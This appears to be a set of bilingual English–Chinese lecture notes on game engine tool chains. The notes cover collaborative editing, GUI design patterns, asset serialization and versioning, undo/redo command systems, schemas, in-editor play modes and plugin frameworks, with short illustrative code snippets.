    One File Per Actor

    ​每个 Actor 一个文件

    webp

    A splitting method proposed by Unreal 5

    ​Unreal 5 提出的一种拆分方法

    • reduces overlap between users by saving data for instances of Actors in external files, removing the need to save the main Level file when making changes to its Actors

      通过将 Actor 实例的数据保存在外部文件中来减少用户之间的重叠,无需在更改 Actor 时保存主关卡文件

    • All Actors are embedded in their respective Level files when cooked

      烘焙后,所有 Actor 都嵌入到各自的关卡文件中

    A Special Way to Split Assets-OFPA

    ​资产分割的特殊方法-OFPA

    webp

    Pros

    • Fine-grained scene division, fewer edit confliction

      场景划分细粒度,编辑冲突更少

    • Only need to save objects modified

      只需保存修改的对象

    Cons

    • Massive files to manage, more burden for version control

      需要管理大量文件,版本控制负担更重

    • Cooking slows down when embedding many OFPA files into the level file

      将许多 OFPA 文件嵌入关卡文件时,烘焙速度会变慢

    Coordinate Editing in One Scene

    ​在一个场景中协调编辑

    webp

    Connect multiple instances of world editor together to work collaboratively in a shared editing session, building a single virtual world together with your teammates and colleagues in real time.

    ​将多个世界编辑器实例连接在一起,在共享编辑会话中协同工作,实时与您的队友和同事一起构建一个虚拟世界。

    How to Synchronize My Operations with Others

    ​如何将我的操作与他人同步

    webp

    Do you remember command system?

    ​你还记得命令系统吗?

    • Serialize my commands and send them to server

      序列化我的命令并将其发送到服务器

    • Receive commands from server and deserialize them

      从服务器接收命令并反序列化它们

    • Invoke commands

      调用命令

    There is A Very Big Challenge

    ​有一个非常大的挑战

    How to ensure the consistency of distributed operations?

    ​如何保证分布式操作的一致性?

    webp

    Undo/Redo

    webp

    Operation Merge

    Two Users Cannot Edit The Same instance at The Same Time

    ​两个用户不能同时编辑同一个实例

    Instance lock: Avoid multiple people modifying the same instance at the same time

    实例锁:避免多人同时修改同一个实例

    webp

    Two Users Cannot Edit The Same Asset at The Same Time

    ​两个用户不能同时编辑同一资产

    webp

    Asset lock: Avoid multiple people modifying the same asset at the same time

    资产锁定:避免多人同时修改同一资产

    But Lock is not Omnipotent

    webp

    If there are three users working in the same world, and now User2 presses the undo button, what do we expect to happen? If he presses the redo button next?

    ​如果有三个用户在同一个世界中工作,现在用户 2 按下了撤消按钮,我们期望发生什么?如果他接下来按下重做按钮?

    How to Solve These Problems Thoroughly

    ​如何彻底解决这些问题

    Operation Transform (OT): Abstract each operation into an operation sequence consisting of N enumerable atomic operation types

    操作转换 (OT):将操作抽象为由可枚举的 N 个原子操作类型组成的操作序列

    Conflict-free Replicated Data Type(CRDT): A data structure that is replicated across multiple computers in a network, with the following features:

    无冲突复制数据类型 (CRDT):在网络中的多台计算机上复制的数据结构,具有以下特点:

    • The application can update any replica independently, concurrently and without coordinating with other replicas

      应用程序可以独立、并发地更新任何副本,而无需与其他副本协调

    • An algorithm (itself part of the data type) automatically resolves any inconsistencies that might occur

      算法(本身是数据类型的一部分)会自动解决可能发生的任何不一致问题

    • Although replicas may have different state at any particular point in time, they are guaranteed to eventually converge

      虽然副本在任何特定时间点可能具有不同的状态,但它们最终会收敛
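
    A last-writer-wins register is one of the simplest CRDTs and shows all three properties; the sketch below is illustrative, with plain timestamps standing in for a logical clock:

    #include <cstdint>
    #include <iostream>
    #include <string>

    // Last-Writer-Wins register: each replica can be updated independently;
    // merging keeps the value with the newest timestamp (ties broken by
    // replica id), so all replicas converge regardless of merge order.
    struct LwwRegister
    {
        std::string value;
        uint64_t    timestamp  = 0; // e.g. a Lamport clock
        int         replica_id = 0;

        void set(const std::string& v, uint64_t ts, int id)
        {
            value = v; timestamp = ts; replica_id = id;
        }

        void merge(const LwwRegister& other)
        {
            if (other.timestamp > timestamp ||
                (other.timestamp == timestamp && other.replica_id > replica_id))
            {
                *this = other;
            }
        }
    };

    int main()
    {
        LwwRegister a, b;
        a.set("tree_count=10", 1, /*replica*/ 1); // editor A's change
        b.set("tree_count=12", 2, /*replica*/ 2); // editor B's later change
        a.merge(b);
        b.merge(a);
        std::cout << a.value << ' ' << b.value << '\n'; // both converge to tree_count=12
    }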

    Traditional Workflow vs. Collaborative Editing Workflow

    ​传统工作流程与协作编辑工作流程

    webp

    Traditional Workflow

    webp

    Collaborative Editing Workflow

    Server is the Most Important Role

    ​服务器是最重要的角色

    webp

    Client

    ​客户端

    • Crash

      崩溃

    • Maloperation

      操作不当

    Server

    ​服务器

    • Crash

      崩溃

    • The server retains each session until the user who created the session expressly deletes it, or until the server itself is shut down.

      服务器保留每个会话,直到创建会话的用户明确删除它,或直到服务器本身关闭。

    • Save session records to disk

      将会话记录保存到磁盘

    References

    Lecture 13: Foundations of the Engine Tool Chain

    第十三节:引擎工具链基础

    Outline of Tool Chains

    Foundation of Tool Chains

    • What is Game Engine Tool Chains

      什么是游戏引擎工具链

    • Complicated Tool GUI

      复杂的工具 GUI

    • How to Load Assets - Deserialization

      如何加载资产-反序列化

    • How to Make Robust Tools

      如何制作鲁棒的工具

    • How to Make Tool Chain

      如何制作工具链

    • What You See is What You Get

      所见即所得

    • One More Thing - Plugin

      还有一件事 - 插件

    Applications & Advanced Topic

    • Common Game Production Workflow

      常见的游戏制作工作流程

    • Common Editors

      常见的编辑器

    • Reflection

      反射

    • Collaborative Editing

      协作编辑

    What is Game Engine Tool Chain

    ​什么是游戏引擎工具链?

    Layer Between Users and Engine Runtime

    ​用户和引擎运行时之间的层。让用户更好地操作游戏引擎写游戏。

    webp

    Bridge Between DCC Tools and Game Engine

    ​DCC 工具和游戏引擎之间的桥梁

    webp

    This lets the game engine read the art assets that users create with various tools.

    ​让游戏引擎能够读取用户使用各种工具创造的艺术资源。

    Let Users with Hugely Different Mindsets Work Together

    ​让不同心态的用户共同合作

    webp

    For Designers

    对于设计师

    • Iterate the gameplay quickly

      快速迭代游戏玩法

    • Implement game logic prototype quickly even without programming

      无需编程即可快速实现游戏逻辑原型

    • Edit massive data easily

      轻松编辑海量数据

    For Artists

    对于艺术家

    • The quality of the result

      结果质量

    • Convenient workflow

      便捷的工作流程

    • What you see is what you get (WYSIWYG)

      所见即所得 (WYSIWYG)

    Complicated Tool GUI

    ​复杂的工具 GUI

    Graphics User Interface (GUI)

    ​图形用户界面 (GUI)

    webp

    GUI is getting more and more complex

    ​GUI 越来越复杂

    • Fast iteration

      快速迭代

    • Separation of design and implementation

      设计和实现分离

    • Reusability

      可重用性

    Immediate Mode

    webp

    • The client calls cause rendering of graphics objects to the display.

      客户端调用导致图形对象渲染到显示器。

    • The data to describe rendering primitives is inserted frame by frame directly from the client into a command list.

      描述渲染图元的数据直接从客户端逐帧插入到命令列表中

    Imgui::DrawButton("hello", 12, 24, &callback_func);

    webp

    Characteristic

    ​特点

    • Lightweight

      轻量级

    • Procedural programming

      程序化编程

    • Widgets don’t maintain any data or state

      小部件不维护任何数据或状态

    Pros

    ​优点

    • Straightforward

      直接

    • Simple

      简单

    • Quick prototype

      快速原型

    Cons

    ​缺点

    • Poor scalability

      可扩展性差

    • Poor performance

      性能差

    • Poor maintainability

      可维护性差

    Examples

    ​示例

    • Unity UGUI
    • Omniverse GUI
    • Piccolo GUI

    Retained Mode

    ​保留模式

    webp

    • The graphics library, instead of the client, retains the scene to be rendered.

      图形库(而不是客户端)保留要渲染的场景。

    • The client calls into the graphics library do not directly cause actual rendering, but make use of extensive indirection to resources managed by the graphics library.

      客户端对图形库的调用不会直接导致实际渲染,而是利用图形库管理的大量间接资源。

    HorizontalLayout layout = new HorizontalLayout();
    Button button = new Button();
    button.setText("Hello!");
    button.setWidth(12);
    button.setHeight(24);
    button.setCallback(&callback_func);
    layout.Add(button);

    webp

    Characteristic

    ​特点

    • Object-oriented

      面向对象

    • Widgets contain their own state and data

      小部件包含自己的状态和数据

      • Draw widgets as needed

        根据需要绘制小部件

    • Complicated effects (animation, etc.)

        复杂效果(动画等)

    Pros

    ​优点

    • High scalability

      高可扩展性

    • High performance

      高性能

    • High maintainability

      高可维护性

    Cons

    ​缺点

    • Complex for developers

      对开发人员来说很复杂

      • Message queue / callbacks

        消息队列 / 回调

      • Synchronization between GUI and application

        GUI 和应用程序之间的同步

    Design Pattern-MVC

    webp

    The user manipulates the Model through the Controller, and the Model updates the View that the user sees.

    ​用户借助 Controller 操作 Model,Model 更新 View 给用户看。

    Invented by Trygve Reenskaug in 1978, to bridge the gap between the human user’s mental model and the digital model that exists in the computer.

    ​由 Trygve Reenskaug 于 1978 年发明,用于弥合人类用户的心理模型与计算机中存在的数字模型之间的差距。

    Model: The central component of the pattern, responsible for managing the data of the application.

    模型:模式的核心组件,负责管理应用程序的数据。

    View: Any representation of information such as a chart, diagram or table.

    视图:任何信息表示形式,例如图表、图解或表格。

    Controller: Accepts input and converts it to commands for the model or view.

    控制器:接受输入并将其转换为模型或视图的命令。

    Design Pattern-MVP

    The evolution of the MVC design pattern, wherein the controller is replaced by the presenter.

    ​MVC 设计模式的演变,其中控制器被演示者取代。

    webp

    Unlike MVC, the arrows here are bidirectional.

    ​不同于 MVC,这次使用双向箭头。

    Model: An interface defining the data to be displayed or otherwise acted upon in the user interface.

    模型:定义要在用户界面中显示或以其他方式执行的数据的接口。

    View: A passive interface that displays data (the model) and routes user commands (events) to the presenter to act upon that data.

    视图:显示数据(模型)并将用户命令(事件)路由到演示者以对该数据执行操作的被动接口。

    Presenter: Acts upon the model and the view. It retrieves data from repositories (the model), and formats it for display in the view.

    演示者:对模型和视图执行操作。它从存储库(模型)检索数据,并将其格式化以在视图中显示。

    Design Pattern-MVVM

    A variation of Model / View / Controller (MVC)

    webp

    In MVVM, View is the responsibility of a designer rather than a classic developer.

    ​在 MVVM 中,View 是设计师而非传统开发人员的职责。

    The designer is generally a more graphical, artistic focused person, and does less classic coding than a traditional developer.

    ​设计师通常更注重图形和艺术,与传统开发人员相比,他们较少进行传统编码。

    webp

    View: Built with a WYSIWYG tool such as Dreamweaver or VS Blend and saved as html/xaml; the view state that MVC encodes in its View classes is not easy to represent.

    View:使用 Dreamweaver、VS Blend 等所见即所得工具并保存为 html/xaml,MVC 在其 View 类中编码的视图状态不易表示。

    Binding: Bind View data to the Model; no more code in View classes.

    Binding:将 View 数据绑定到 Model,View 类中不再有代码。

    ViewModel - Model of View: The Model is very likely to have data types that cannot be mapped directly to controls; the ViewModel contains data transformers that convert Model types into View types.

    ViewModel - View 的模型:Model 很可能具有无法直接映射到控件的数据类型,ViewModel 包含将 Model 类型转换为 View 类型的数据转换器。


    Pros

    ​优点

    • Independent development

      独立开发

    • Easy to maintain and test

      易于维护和测试

    • Easy to reuse components

      易于重用组件

    Cons

    ​缺点

    • For simple UI, MVVM can be overkill

      对于简单的 UI,MVVM 可能有点过头了

    • Data-binding is declarative and harder to debug

      数据绑定是声明性的,更难调试

    Serialization and Deserialization

    ​序列化与反序列化

    webp

    Serialization is the process of translating a data structure or object state into a format that can be stored (for example, in a file or memory data buffer) or transmitted (for example, over a computer network) and reconstructed later.

    ​序列化是将数据结构对象状态转换为可存储(例如,在文件或内存数据缓冲区中)或传输(例如,通过计算机网络)并在稍后重建的格式的过程。

    Deserialization is the opposite operation, extracting a data structure from a series of bytes.

    反序列化是相反的操作,从一系列字节中提取数据结构。

    Text Files

    webp

    Object data structures designed with text documents.

    ​使用文本文档设计的对象数据结构。

    • Save data as text files
    • Example: TXT, Json, YAML, XML…
    • Can be read by common text editors

    Engine applications:

    • Unity Editor (optional): subset of YAML
    • Piccolo: Json
    • Cryengine: XML/Json (optional)

    Binary Files

    webp

    • Save data as bytes stream

      将数据保存为字节流

    • Need additional tools for read/write

      需要额外的读/写工具

    • Example: UAsset, FBX Binary

      示例:UAsset、FBX 二进制

    Engine applications:

    • Unity Runtime, Unity Editor (optional 可选)
    • CryEngine (optional 可选)
    • Unreal: UAsset

    Storage Comparison -Text vs. Binary

    ​存储比较 - 文本与二进制

    webp

    Text is readable but takes more disk space and is slower to read; binary is compact and performant but hard to read and inconvenient to debug.

    ​文本可读性好但是占用空间大,读取速度慢。二进制体积小,性能好但是可读性差,不便于调试。

    Asset Data Redundancy

    ​资源数据重复

    webp

    The meshes in the red boxes are redundant data.

    ​红框内的网格是冗余数据。

    How do game developers solve the problem?

    ​游戏开发者如何解决这个问题?

    Asset Reference

    ​资产引用

    webp

    Asset referencing is a way to separate redundant data into asset files and complete the association by establishing reference relationships.

    ​资产引用是一种将冗余数据分离到资产文件中,通过建立引用关系完成关联的方式。

    Object instance in Scene

    ​场景中的对象实例

    webp

    Data instancing is a way to create parent data that you can use as a base to make a wide variety of different children; the parent can also be used directly.

    数据实例是一种创建父数据的方法,您可以将其用作基础来制作各种不同的子数据,也可以直接使用。

    Object instance Variance

    ​对象实例变化

    webp

    How to change the texture of Ground1 from stone to castle stone?

    ​如何将 Ground1 的纹理从石头更改为城堡石头?

    Build Variance by Copying

    ​通过复制构建差异

    webp

    Intuitive way: make a copy of instance data, modify the copy

    ​直观的方式:复制实例数据,修改副本

    • adds lots of redundant data

      添加大量冗余数据

    Build Variance by Data Inheritance

    ​通过数据继承构建差异

    webp

    Data inheritance: Inherit the data of a parent object and allow overriding assignments to the data defined in its data structure.

    数据继承:继承继承对象的数据并允许覆盖其数据结构中定义的数据的分配。

    How to Load Assets - Deserialization

    ​如何加载资产 - 反序列化

    Parse Asset File

    ​解析资产文件

    webp

    How do we know how to instantiate A or its fields? Store the types of A and its fields.

    ​如何知道如何实例化 A 或其字段?——存储 A 和字段的类型

    Build Key-Type-Value Pair Tree

    ​构建键-类型-值对树

    webp

    Binary vs. Text

    ​二进制与文本

    webp

    Where to store the object and field types?

    ​将对象和字段类型存储在哪里?

    • Text: store in asset

      文本:存储在资产中

    • Binary: store in a table

      二进制:存储在表中

    Endianness

    Different hardware architectures use different byte orders.

    ​不同的硬件架构有不同的字节序。

    webp

    Big Endian: begins with the most significant byte and ends with the least significant byte

    ​大端序:以最高有效字节开始,以最低有效字节结束

    Little Endian: begins with the least significant byte and ends with the most significant byte

    ​小端序:以最低有效字节开始,以最高有效字节结束

    Endianness varies among different processors

    ​不同处理器的字节序各不相同

    Processor               Endianness
    PowerPC (PPC)           Big Endian
    Sun Sparc               Big Endian
    IBM S/390               Big Endian
    Intel x86 (32 bit)      Little Endian
    Intel x86_64 (64 bit)   Little Endian
    ARM                     Bi (Big / Little) Endian

    Unreal:

    /**
     * Returns true if data larger than 1 byte should be swapped to deal with endian mismatches.
     * 如果应交换大于 1 字节的数据来处理字节序不匹配问题,则返回 true。
     */
    FORCEINLINE bool IsByteSwapping()
    {
    #if PLATFORM_LITTLE_ENDIAN
        bool SwapBytes = ArForceByteSwapping;
    #else
        bool SwapBytes = this->IsPersistent();
    #endif
        return SwapBytes;
    }
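
    When a mismatch is detected, the loader swaps bytes while reading. A minimal sketch of such a helper (Unreal's actual swapping is done inside its archive serializers):

    #include <cstdint>
    #include <cstdio>

    // Portable 32-bit byte swap: converts between big- and little-endian
    // representations when the asset's endianness differs from the host's.
    uint32_t swapBytes32(uint32_t v)
    {
        return ((v & 0x000000FFu) << 24) |
               ((v & 0x0000FF00u) << 8)  |
               ((v & 0x00FF0000u) >> 8)  |
               ((v & 0xFF000000u) >> 24);
    }

    int main()
    {
        // 0x12345678 stored big-endian, read on a little-endian machine.
        std::printf("%08X\n", swapBytes32(0x12345678u)); // 78563412
    }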

    Asset Version Compatibility

    ​资源版本兼容性

    webp

    Add or Remove Field

    ​添加或删除字段

    original class:

    class GameObject
    {
    private:
        GUID guid;
        string name;
        Transform transform;
    };

    old data:

    {
        "guid": "092xtwg2u4ik1359",
        "name": "Alice",
        "transform": {
            "position": {
                "x": 0,
                "y": 0,
                "z": -0.1
            },
            "rotate": {},
            "scale": {
                "x": 1,
                "y": 1,
                "z": 1
            }
        }
    }

    updated class 1

    class GameObject
    {
    private:
        GUID guid;
        string name;
    };

    updated class 2

    class GameObject
    {
    private:
        GUID guid;
        string name;
        Transform transform;
        BoundingBox bbox;
    };

    Solve Compatibility by Version Hardcode

    ​通过版本硬编码解决兼容性问题

    Unreal: add version to asset

    ​Unreal:将版本添加到资产

    • Load asset: check if field exists then load data

      加载资产:检查字段是否存在,然后加载数据

    • Save asset: write all data to asset file

      保存资产:将所有数据写入资产文件

    class GameObject:
        int x = default;
        float y = default;
        bool z = default; // new field

    function Deserialize(data):
        x = data.GetValue<int>("x");
        y = data.GetValue<float>("y");
        if (GetCurrentVersion() >= data.version) {
            z = data.GetValue<bool>("z");
        }

    function Serialize(data):
        data.SetValue<int>("x", x);
        data.SetValue<float>("y", y);
        data.SetValue<bool>("z", z);
        data.UpdateVersion(GetCurrentVersion());

    Solve Compatibility by Field UID

    ​通过字段 UID 解决兼容性问题

    Google protocol buffers:

    ​Google 协议缓冲区:

    ​unique number for field

    ​字段的唯一编号

    • Every field has a unique number, never change the number.

      每个字段都有一个唯一编号,永远不要更改该编号。

    • Serialization:

      序列化:

      1. For every field, generate a “key” (fixed size) according to its field number and type.

        对于每个字段,根据其字段编号和类型生成一个“键”(固定大小)。

      2. Store field data with key, key is stored in the first few bytes

        使用键存储字段数据,键存储在前几个字节中

    • Deserialization:

      反序列化:

      1. Field not in schema but in data: the key would not be recognized, skip the field.

        字段不在架构中但在数据中:键将无法识别,跳过该字段。

      2. Field in schema but not in data: set default value.

        字段在架构中但不在数据中:设置默认值。

    message PrefabObjectBinary {
        string guid = 1;
        string file_name = 2;
        repeated string game_object_guid_list = 3;
    }

    webp

    How to Make Robust Tools

    ​如何制作鲁棒的工具?

    • Undo & Redo

      要有 Ctrl + Z 和 Ctrl + Y 的功能

    • Crash Recovery

      程序崩溃时能够回档

    Command

    webp

    • Abstract all user operations into atomic commands which can be invoked, revoked, serialized and deserialized.

      将所有用户操作抽象为可以调用、撤销、序列化、反序列化的原子命令。

    Command-Definition

    • ICommand<TData> provides a basic abstraction of the command.

      ICommand<TData> 提供命令的基本抽象。

    • Every system (which wants to support undo/redo/crash recovery …) needs to implement the system-related commands inherited from ICommand<TData>.

      每个系统(想要支持撤消/重做/崩溃恢复…)都需要实现从 ICommand<TData> 继承的系统相关命令。

    public interface ICommand<TData>
    {
        long UID { get; set; }
        TData Data { get; set; }
        void Invoke();
        void Revoke();
        byte[] Serialize();
        void Deserialize(byte[] data);
    }

    Command-UID

    Commands need to strictly follow their original sequence when recovering from disk

    ​从磁盘恢复时命令需要严格遵循顺序

    • Monotonic increase over time

      随时间单调增加

    • Unique identification

      唯一标识

    Command Serialize and Deserialize

    ​命令序列化和反序列化

    • Provide functions to serialize a command instance to data and deserialize data back into a command instance.

      提供将命令实例序列化为数据和将数据反序列化为命令实例的函数。

    • The TData type needs to provide serialize and deserialize interfaces.

      TData 类型需要提供序列化和反序列化接口。

    Three key Commands

    ​三个关键命令

    • Add

      • Data: Usually data is a copy of the runtime instance

        通常数据是运行时实例的副本

      • Invoke: Create a runtime instance with data

        使用数据创建运行时实例

      • Revoke: Delete the runtime instance

        删除运行时实例

    • Delete

      • Data: Usually data is a copy of the runtime instance

        通常数据是运行时实例的副本

      • Invoke: Delete the runtime instance

        删除运行时实例

      • Revoke: Create a runtime instance with data

        使用数据创建运行时实例

    • Update

      • Data: Usually data is the old and new values of the modified properties of the runtime instance and their property names

        通常数据是运行时实例修改属性的新旧值及其属性名称

      • Invoke: Set the runtime instance property to the new value

        将运行时实例属性设置为新值

      • Revoke: Set the runtime instance property to the old value

        将运行时实例属性设置为旧值
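
    As a sketch, here is a C++ analog of an Update command against that interface (the Light type, its property, and the simplified serialization are illustrative):

    #include <cstring>
    #include <iostream>
    #include <vector>

    // Runtime instance whose property the command edits.
    struct Light { float intensity = 0.0f; };

    // Update command: stores old and new values so it can invoke and revoke.
    class UpdateIntensityCommand
    {
    public:
        UpdateIntensityCommand(Light& target, float new_value)
            : m_target(target), m_old_value(target.intensity), m_new_value(new_value) {}

        void invoke() { m_target.intensity = m_new_value; } // redo
        void revoke() { m_target.intensity = m_old_value; } // undo

        // Serialize old/new values so the command can be replayed after a crash.
        std::vector<unsigned char> serialize() const
        {
            std::vector<unsigned char> data(2 * sizeof(float));
            std::memcpy(data.data(), &m_old_value, sizeof(float));
            std::memcpy(data.data() + sizeof(float), &m_new_value, sizeof(float));
            return data;
        }

    private:
        Light& m_target;
        float  m_old_value;
        float  m_new_value;
    };

    int main()
    {
        Light light;
        UpdateIntensityCommand cmd(light, 5.0f);
        cmd.invoke();  std::cout << light.intensity << '\n'; // 5
        cmd.revoke();  std::cout << light.intensity << '\n'; // 0 (undo)
    }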

    How to Make Tool Chain

    Various Tools for Different Users

    webp

    • Different views for different tools

      不同工具有不同的视图

    • Each tool has its own data structure

      每个工具都有其所有者数据结构

    • The same data may have different views for different users

      同一数据可能对不同用户有不同的视图

    Develop all Tools Separately?

    ​单独开发所有工具?

    Simplest Way

    ​最简单的方法

    • No scalability

      没有可扩展性

    • No maintainability

      没有可维护性

    Find Common Building Blocks

    ​寻找共同的构建块

    webp

    Any complex structure is made up of simple structures, we just need a standard language to describe it.

    ​任何复杂的结构都是由简单的结构组成的,我们只需要一种标准的语言来描述它。

    Schema - A Description Structure

    ​Schema - 一种描述结构

    webp

    A data schema is the formal description of the structures your system is working with.

    数据模式是系统正在使用的结构的正式描述

    Standardizing the world description language

    ​标准化世界描述语言

    • Unified the data processor

      统一数据处理器

    • Normalized data between different tools

      不同工具之间的标准化数据

    • Ability to automatically generate standardized UI

      能够自动生成标准化 UI

    Schema - Basic Elements

    ​Schema - 基本元素

    webp

    Abstraction of the basic building block of the world

    ​世界基本构成块的抽象

    • Atomic Types: Int, Float, Double …

      原子类型:Int、Float、Double…

    • Class Type: Use atomic types to present complex data structure

      类类型:使用原子类型呈现复杂的数据结构

    • Containers: Array, Map

      容器:Array、Map

    Schema-Inheritance

    Abstraction of the inheritance relationship of the world

    ​世界继承关系的抽象

    webp

    class A {/*...*/};
    class B : A {/*...*/};
    class C : A {/*...*/};

    Schema-Data Reference

    Abstraction of the reference relationship of the world

    ​世界引用关系的抽象

    webp

    In the code, we need to read the data through the file path and instantiate it into the corresponding file class.

    ​在代码中我们需要通过文件路径读取数据,并实例化成对应的文件类。

    Schema - 2 Definition Ways

    webp

    Standalone schema definition file

    ​独立的架构定义文件

    Pros

    ​优点

    • Comprehension easily

      易于理解

    • Low coupling

      低耦合

    Cons

    ​缺点

    • Ease to mismatch between engine version and schema version

      引擎版本和架构版本容易不匹配

    • Difficult to define function in the structure

      难以在结构中定义函数

    • Need to implement complete syntax

      需要实现完整的语法

    Defined in code

    ​在代码中定义

    Pros

    ​优点

    • Ease to accomplish Function reflection

      易于实现函数反射

    • Natural support for inheritance relationships

      自然支持继承关系

    Cons

    ​缺点

    • Difficult to understand

      难以理解

    • High coupling

      高耦合

    Three Views For Engine Data

    webp

    ​数据以三个形式存在:存储器中、运算器中,还要便于用户理解。

    Runtime View

    ​运行时视图

    Focus:

    ​重点:

    • Read at a faster speed

      以更快的速度阅读

    • Calculate at a faster speed

      以更快的速度计算

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    class RuntimeSpotlight
    {
    public:
    // Spot Light Translation Matrix
    Matrix4x4 light trans {Matrix4x4::IDENTITY};
    // Spot Light Cone
    float inner_cone_radian = 0.0f;
    float outer_cone radian = 0.0f;
    // Spot Light intensity and units
    float intensity = 0.0f;
    LightUnits unit= CANDELA;
    // Spot Light Color
    Vector4 light color {Vector4::ZERO};
    // other light data like shadow...
    }

    Storage View

    Focus:

    ​重点:

    • Write at a faster speed

      写入速度更快

    • Occupies less hard disk space

      占用更少的硬盘空间

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    "Position:X": 1.0,
    "Position:Y": 1.0,
    "Position:Z": 1.0
    "Rotation:X": 0.0,
    "Rotation:Y": 0.0,
    "Rotation:Z": 0.0,
    "Rotation:W" : 1.0,
    "Scale:X": 1.0,
    "Scale:Y": 1.0,
    "Scale:Z": 1.0,
    // cone degree
    "inner cone_degree": 30,
    "outer cone_degree": 60,
    //sds
    "intensity": 0.0,
    "unit": 1
    //other data..

    Tools View

    webp

    Focus:

    ​重点:

    • More understandable form

      更易理解的形式

    • The need for multiple editing modes

      需要多种编辑模式

    Other Point:

    ​其他点:

    Tool data does not generally exists. Usually, special processing is done when the UI interface is generated

    ​工具数据一般不存在,通常在生成 UI 界面时进行特殊处理

    Tools View - Understandable

    webp

    ​比如,计算中使用弧度,但给用户一般使用角度。

    Too View-Various Editor Nodes

    ​Too View-各种编辑器节点

    webp

    Different edit mode for groups with different needs

    ​针对不同需求的群体提供不同的编辑模式

    What You See is What You Get (WYSIWYG)

    ​所见即所得

    User Friendly for Artists

    User Friendly for Designer

    Stand-alone Tools

    webp

    Stand-alone Tools is a kind of tool that canrun independently of the engine.

    独立工具是一种可以独立于引擎运行的工具。将 Tool Layer 与其他层并列。

    Pros

    ​优点

    • Suitable for use as a DCC tool plug-in

      适合用作 DCC 工具插件

    • Easy to start developing tools

      易于上手开发工具

    Cons

    ​缺点

    • Difficult to achieve WYSIWYG

      难以实现所见即所得

    In Game Tools

    webp

    In Game Tools is a kind of tool based on engineruntime system work.

    游戏内工具 是一种基于引擎运行时系统工作的工具。将 Tool Layer 置于顶层。

    Pros

    ​优点

    • Access to all engine data directly

      直接访问所有引擎数据

    • Easy to preview the game in the editor

      易于在编辑器中预览游戏

    • Easy to make live in-game editing

      易于进行实时游戏内编辑

    Cons

    ​缺点

    • Complex engine architecture

      引擎架构复杂

    • Requires a complete engine Ul system to makethe editor Ul

      需要完整的引擎 UI 系统才能制作编辑器 UI

    • When the engine is crashing, the tools become unusable as well

      当引擎崩溃时,工具也会变得无法使用

    In Game Tools-Editor Mode

    ​游戏工具-编辑器模式

    webp

    Editor Mode: Support to modify and preview scene data

    编辑器模式:支持修改和预览场景数据(如 Unity 在运行时调试)

    • Real time preview of scene data modification

      实时预览场景数据修改

    • Logic systems do not tick, so there are more hardware resources to display more scene details

      逻辑系统不勾选,因此有更多的硬件资源来显示更多的场景细节

    Play in Editor (PIE)

    ​在编辑器中玩游戏 (PIE)

    PIE: Directly play game in editor, no need to close editor and start game mode

    PIE:直接在编辑器中玩游戏,无需关闭编辑器并启动游戏模式

    • Save loading time

      节省加载时间

    • The continuity of creation is maintained

      保持创作的连续性

    • Quickly test modifications

      快速测试修改

    Two implemation ways

    ​两种实现方式

    • Play in editor world: Start gameplay systems tick in editor world and play in it

      在编辑器世界中玩游戏:在编辑器世界中启动游戏系统并在其中玩游戏

    • Play in PIE world: Duplicate editor world to create a PlE world and play in it

      在 PIE 世界中玩游戏:复制编辑器世界以创建 PlE 世界并在其中玩游戏

    PIE Mode -Play in Editor World

    ​PIE 模式 - 在编辑器世界中游戏

    webp

    Pros

    ​优点

    • Easy architecture tools layer

      简单的架构工具层

    • Quick state change

      快速状态更改

    Cons

    ​缺点

    • Game mode may cause data changes

      游戏模式可能导致数据更改

    Example

    ​示例

    • Piccolo

    PIE Mode -Play in PIE World

    ​PIE 模式 - 在 PIE 世界中游戏

    webp

    Pros

    ​优点

    • Data separation

      数据分离

    • Easy to instantiate multiple game instances Cons

      易于实例化多个游戏实例

    Cons

    ​缺点

    • Architecture complex

      架构复杂

    Example

    • Unreal

    One More Thing - Plugin

    ​还有一件事 - 插件

    ​游戏引擎开发者不可能顾虑到所有可能的游戏开发情况,允许插件扩展游戏引擎的功能。

    Extensibility

    ​可扩展性

    Different games need different customization of engine tools.

    ​不同的游戏需要对引擎工具进行不同的定制。

    Engine tools use plug-in mechanism to satisfy the needs.

    ​引擎工具使用插件机制来满足需求。

    Plug-in-Showcases

    webp

    Plug-in - Framework

    webp

    Plug-in : A software component that adds a specific feature to an existing computer program.

    插件:为现有计算机程序添加特定功能的软件组件。

    PluginManager: Manage plugin loading and unloading.

    PluginManager:管理插件的加载和卸载。

    Interface: A series of abstract classes provided to plug-ins, plug-ins can choose to instantiate different classes to realize the development of corresponding functions.

    Interface:提供给插件的一系列抽象类,插件可以选择实例化不同的类来实现相应功能的开发。

    API: A series of functions exposed by the engine, plug-ins can use functions to execute the logic what we want.

    API:引擎暴露出来的一系列函数,插件可以使用这些函数来执行我们想要的逻辑。

    Plug-in-Add a Toolbar Button

    ​插件-添加工具栏按钮

    webp

    Plug-in -Add a Plug-in Menu in Unreal5

    webp

    Plug-in-Summary

    ​插件概述

    webp

    The meaning of plug-in framework

    ​插件框架的意义

    • Extend editor functionality

      扩展编辑器功能

    • Ease to hot update as decoupling

      解耦,方便热更新

    • Facilitate the construction of engine development ecology

      方便引擎开发生态的构建

    Plug-in framework requirements

    ​插件框架要求

    • Full API support

      完整的 API 支持

    • Common interface support

      通用接口支持

    References

    ​参考文献

    第十四节:引擎工具链高级概念与应用

    Glance of Game Production

    ​游戏制作概览

    whether to work on the environment, the animation, to place characters or to create missions.

    ​是在环境,动画中工作,放置角色还是创建任务

    Adapt to Different Game Genres

    ​适应不同的游戏类型

    webp

    Challenges from Real Production

    ​真实游戏开发中的挑战。

    webp

    ​在游戏开发中:

    • Massive various data from DCC and engine tools

      大量来自 DCC 和发动机工具的各种数据

    • Artist, designer and programmer with different mindsets

      艺术家,设计师和具有不同心态的程序员

    • WYSIWYG is must for highquality production

      所见即所得,必须高质量生产

    World Editor-A hub for everything to build the world

    ​世界编辑 - A Hub供所有建立世界的枢纽

    webp

    ​Unreal 为游戏开发者提供的界面。

    Editor Viewport: A Special Version of Game Engine

    ​编辑器视口:游戏引擎的特殊版本

    • Main window of interaction between designers and game world

      设计师与游戏世界之间的互动主窗口(便于设计师 Debug 用的互动窗口)

    • Powered by a full game engine in special "editor” mode

      由特殊“编辑”模式的完整游戏引擎提供动力

    • Provides a variety of special gadgets and visualizers for editing

      提供各种用于编辑的特殊小工具和可视化器

    WARNING: Editor-only code must be moved out of released game!

    ​警告:仅编辑代码必须从发布的游戏中移出!

    Everything is an Editable Object

